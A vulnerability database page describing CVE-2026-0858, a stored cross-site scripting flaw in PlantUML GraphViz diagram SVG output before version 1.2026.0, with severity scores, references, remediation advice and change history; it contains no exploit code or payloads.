CVE-2026-0858 - Vulnerability Details

- plantuml: PlantUML: Arbitrary script execution via Stored Cross-Site Scripting in GraphViz diagrams

Description

Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG.

Published: 2026-01-16

Score: 5.1 Medium

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

The vulnerability is a stored cross‑site scripting flaw that originates from insufficient sanitization of interactive attributes in GraphViz diagrams produced by PlantUML. A maliciously crafted diagram can inject JavaScript into the resulting SVG, which then executes with the privileges of any application that renders the SVG. This is an input validation weakness, classified as CWE‑79.

Affected Systems

PlantUML (net.sourceforge.plantuml:plantuml) versions older than 1.2026.0 are affected. Clients that generate or display GraphViz diagrams with these older versions can be exploited.

Risk and Exploitability

The CVSS score of 5.1 indicates moderate risk, while the EPSS score of less than 1 % shows a very low probability of exploitation, and it is not listed in the CISA KEV catalog. Exploitation requires that an attacker supply a PlantUML diagram that the application stores and later renders as SVG; the injected script runs in the context of the rendering application or the user's session, potentially enabling data theft or session hijacking. Attackers with the ability to influence the content rendered by the vulnerable application are the primary threat actors.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

n/a

net.sourceforge.plantuml:plantuml

affected

Version	Status	Constraints
`0`	affected	< 1.2026.0

Configuration 1 [-]

cpe:2.3:a:plantuml:plantuml:*:*:*:*:*:*:*:*

No data.

Vendor	Product	Confidence	Versions
Plantuml	Plantuml	—	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Upgrade to PlantUML v1.2026.0 or later, which removes the insecure handling of interactive GraphViz attributes.
If upgrading is delayed, sanitize or strip interactive attributes from any generated SVG before it is served to users, and restrict the use of untrusted diagram input.
Monitor application logs for signs of injected script execution and disable diagram import functionality if it is not essential to operations.

Generated by OpenCVE AI on April 18, 2026 at 05:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

Source	ID	Title
Github GHSA	GHSA-hrvf-g648-rf3m	PlantUML is vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams

Attack Vector Network

Attack Complexity Low

Privileges Required None

Attack Requirements None

User Interaction Active

Vulnerable System Confidentiality Impact None

Vulnerable System Integrity Impact Low

Vulnerable System Availability Impact None

Subsequent System Confidentiality Impact Low

Subsequent System Integrity Impact Low

Subsequent System Availability Impact None

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction Required

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00015.

Exploitation none

Automatable no

Technical Impact partial

References

Link	Providers
https://github.com/plantuml/plantuml/commit/6826315db092d2e432aeab1a0894e08017c6e4bd
https://github.com/plantuml/plantuml/releases/tag/v1.2026.0
https://nvd.nist.gov/vuln/detail/CVE-2026-0858
https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEPLANTUML-14552230
https://www.cve.org/CVERecord?id=CVE-2026-0858

History

Mon, 02 Feb 2026 19:00:00 +0000

Type	Values Removed	Values Added
CPEs		cpe:2.3:a:plantuml:plantuml::::::::

Fri, 16 Jan 2026 14:15:00 +0000

Type	Values Removed	Values Added
First Time appeared		Plantuml Plantuml plantuml
Vendors & Products		Plantuml Plantuml plantuml
Metrics		ssvc `{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}`

Fri, 16 Jan 2026 12:15:00 +0000

Type	Values Removed	Values Added
Title		plantuml: PlantUML: Arbitrary script execution via Stored Cross-Site Scripting in GraphViz diagrams
References		https://nvd.nist.gov/vuln/detail/CVE-2026-0858 https://www.cve.org/CVERecord?id=CVE-2026-0858
Metrics	threat_severity `None`	threat_severity `Moderate`

Fri, 16 Jan 2026 05:15:00 +0000

Type	Values Removed	Values Added
Description		Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG.
Weaknesses		CWE-79
References		https://github.com/plantuml/plantuml/commit/6826315db092d2e432aeab1a0894e08017c6e4bd https://github.com/plantuml/plantuml/releases/tag/v1.2026.0 https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEPLANTUML-14552230
Metrics		cvssV3_1 `{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P'}` cvssV4_0 `{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:P'}`

Subscriptions

Plantuml Plantuml

MITRE

Status: PUBLISHED

Assigner: snyk

Published: 2026-01-16T05:00:06.808Z

Updated: 2026-01-16T14:10:00.485Z

Reserved: 2026-01-12T09:57:41.760Z

Link: CVE-2026-0858

Vulnrichment

Updated: 2026-01-16T14:09:56.891Z

NVD

Status : Analyzed

Published: 2026-01-16T05:16:16.117

Modified: 2026-02-02T18:52:02.240

Link: CVE-2026-0858

Redhat

Severity : Moderate

Publid Date: 2026-01-16T05:00:06Z

Links: CVE-2026-0858 - Bugzilla

OpenCVE Enrichment

Updated: 2026-04-18T06:00:08Z

Weaknesses

CWE-79

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required None

Attack Requirements None

User Interaction Active

Vulnerable System Confidentiality Impact None

Vulnerable System Integrity Impact Low

Vulnerable System Availability Impact None

Subsequent System Confidentiality Impact Low

Subsequent System Integrity Impact Low

Subsequent System Availability Impact None

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction Required

Exploitation none

Automatable no

Technical Impact partial

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object